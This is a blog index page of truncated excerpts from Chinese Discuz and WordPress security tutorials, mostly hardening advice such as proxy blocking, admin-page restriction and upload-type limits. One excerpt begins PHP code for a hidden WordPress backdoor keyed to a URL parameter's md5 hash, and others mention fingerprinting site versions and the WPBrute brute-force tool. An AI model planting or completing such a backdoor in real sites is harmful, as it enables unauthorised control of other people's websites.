• Discuz安全策略:如何限制使用代理访问Discuz论坛(禁止代理IP访问)

    Discuz内置了$_config['security']['attackevasive'] CC攻击防御,可以设置站点的防御级别,参数有1|2|4|8,并且可以互相组合,来防止大量的非正常请求和正常请求造成的拒绝服务攻击。 其中: 1代表cookie 刷新限制:当同一个 cookie 请求大于或等于 1 秒时刷新,将被限制访问。 2代表限制代理访问:即通过代理IP访问会被禁止 4代表二次请求:开启了二次请求机制,先显示等待 2 秒重新...阅读全文
    作者:sdujane | 分类:Discuz教程 | 阅读:2,055 浏览数 | 标签:,
  • Discuz! X3.1/Discuz! X3.2 禁止非管理组直接访问登陆后台

    Discuz!程序的可以直接访问登陆后台地址“ http://yourdomain.com/admin.php ”,垃圾站博客今天就给大家分享一下如何防止Discuz!X3.1-x3.2后台被恶意访问,为了防止程序后台被恶意访问,大家可以做一下修改: 首先用FTP工具连接主机服务器,在网站根目录找到admin.php,用文本编辑器找到如下代码: $discuz->init(); 接下来在此行代码下面添加如下代码: if(!$_G['uid'] || !getsta...阅读全文
    作者:sdujane | 分类:Discuz教程 | 阅读:944 浏览数 | 标签:,
  • 如何检测自己或对方博客的WordPress版本

    如何检测自己或对方博客的WordPress版本,垃圾站博客讲述快速查看对方网站WordPress版本小技巧,该方法极其侮辱站长们的智商,不幸垃圾站博主也在被侮辱之列。 WordPress安装根目录自带一个Readme.html文件,访问 http://你的域名/readme.html 里面白底黑字的标明了WordPress版本信息,如下图: 当然上面的图片显示的wordpress版本不是垃圾站博客的,经过检测大多数站长都中招了,这里就不...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:867 浏览数 | 标签:,
  • 教程:如何给WordPress网站创建后门

    是不是想知道如何给一个WordPress站点创建后门?今天垃圾站博客将要详细讲解利用代码创建后门,向你展示如何做到这一点。至于你如何利用这段代码完全是取决于你!垃圾站博客鼓励用正确的方式使用这段代码,而不是用来做坏事! <?php add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:9,324 浏览数 | 标签:,
  • 如何删除WordPress版本升级之后残留的旧核心文件

    WordPress作为一款博客开源系统,是由全球社区定期管理维护,随着新的WordPress版本的推出,旧版本中不必要的特性可能被淘汰,升级之后就有可能会残留某些无用的旧文件,然而更新却不会自动删除这些旧核心文件。如果这些文件存在安全漏洞就可能成为黑客攻击的对象。因此在本文中,垃圾站博客将向您展示使用 “Old Core Files” 插件检测和删除旧的WordPress核心文件。 安装方法:在博客后台-...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:8,436 浏览数 | 标签:,
  • WordPress博客如何修改管理员账号及公开显示昵称

    WordPress博客默认显示管理员为“admin”,但是有的博主不喜欢这个名称想要修改为其他的名字,因此可以登录Wordpress博客后台进行修改,在本文“WordPress博客如何修改管理员账号及公开显示昵称”中垃圾站博客简要介绍2中修改方法: 1、登录Wordpress博客后台–用户–添加用户,如下图所示: 注意将添加用户的角色设置为“管理员”,添加完成后删除原先管理员的“admin”账号即可。 2、...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:10,807 浏览数 | 标签:, ,
  • 如何禁止WordPress博客角色中“作者”修改他人发布的文章

    WordPress博客知识普及,博客用户角色分为:管理员、编辑、作者、投稿者、订阅者。 在Wordpress博客的使用过程中可以知道,作为博客“作者”是有修改他人文章的权限,当其中任何一个博客作者被盗号后就可能导致整个博客的文章全部被恶意删除,这对于一个不经常备份的博客来言是十分危险的,因此“如何禁止Wordpress博客角色中‘作者’修改他人发布的文章”成了本文的焦点! 其实问题的解决方法很...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:10,580 浏览数 | 标签:,
  • 站长之家因备份文件存放不当遭黑客窃取

    垃圾站博主曾经写过一篇网站安全相关的文章“从WordPress主题被盗引发的一些关于博客安全的思考”,而最近据卢松松博客报道Chinaz站长之家源码备份文件存放不当遭窃取,事件起因是由于网站维护人员习惯性的将网站打包备份文件存放在web根目录下而导致网站源码直接被人下载盗窃,由于压缩文件包含网站大量信息进而可能泄露Chinaz服务器密码与程序漏洞等,黑客极有可能将留下的后门文件公布到网...阅读全文
    作者:sdujane | 分类:生活小记 | 阅读:9,653 浏览数 | 标签:,
  • 如何自定义WordPress博客允许的上传文件类型使博客变得更加安全

    当WordPress博客可以自由注册并上传文件时安全隐患就显示出来了,这时我们可以做一些优化使Wordpress博客变得更加安全,本次垃圾站博客带来的教程是“如何自定义Wordpress博客允许的上传文件类型”,教程原理是通过.htaccess文件限制上传安全文件类型使Wordpress的upload文件夹更加安全! 首先:创建一个名为.htaccess的文件,复制以下代码到该文件: <Files ~ ".*..*"> ...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:10,514 浏览数 | 标签:,
  • 垃圾站博客关于万网虚拟主机1月中旬屏蔽百度蜘蛛的猜想

    自2013年1月10号之后就觉得我的论坛大学生社区不正常了,首先是百度来的流量骤降,而后百度快照停滞不前,然而却查找不到什么原因导致大学生社区论坛被百度降权,但是这种情况却未出现任何好转迹象。 到1月18日,就连垃圾站博客也被百度降权,百度索引直接归零,快照什么都没有了! 直到今天偶然site:www.7ur.cn ,首页快照显示“www.7ur.cn – Database Error”如下图: 点击首页百度...阅读全文
    作者:sdujane | 分类:生活小记, 网站优化 | 阅读:18,446 浏览数 | 标签:,
  • WPBrute密码暴力破解软件让WordPress安全情何以堪

    插件Login LockDown可以阻止一些恶意用户猜测Wordpress博客的密码,后台以设定超过输错密码次数后就禁止此IP某段时间内再次尝试输入密码。插件功能包括:增强的密码策略、紧急锁定登录功能、监控登录尝试、封锁攻击者 IP 地址、登录用户空闲一段时间之后自动注销登录等!因此插件Login LockDown比较适合对博客安全需求比较高博主! 不过道高一尺魔高一丈,总是有聪明的黑客会想尽办法破解...阅读全文
    作者:sdujane | 分类:WP教程, 资源分享 | 阅读:74,660 浏览数 | 标签:, ,
  • 介绍增强WordPress博客安全性能的5点建议

    想必博主们都知道做博客最主要的就是安全,但是对于Wordpress博客如何使它更安全知道的博主就不多了,下面垃圾站将详细的说明如何才能使博客更加安全! 1、最简单也是最有必要的: 下载wordpress源码及插件、主题一定要从正规渠道下载,避免下载带有恶意代码的源文件! 2、修改wordpress后台登陆地址链接: wordpress博客默认的登陆链接地址为(http://yourdomain/wp-login.php),因此(1...阅读全文
    作者:sdujane | 分类:WP教程 | 阅读:19,203 浏览数 | 标签:, ,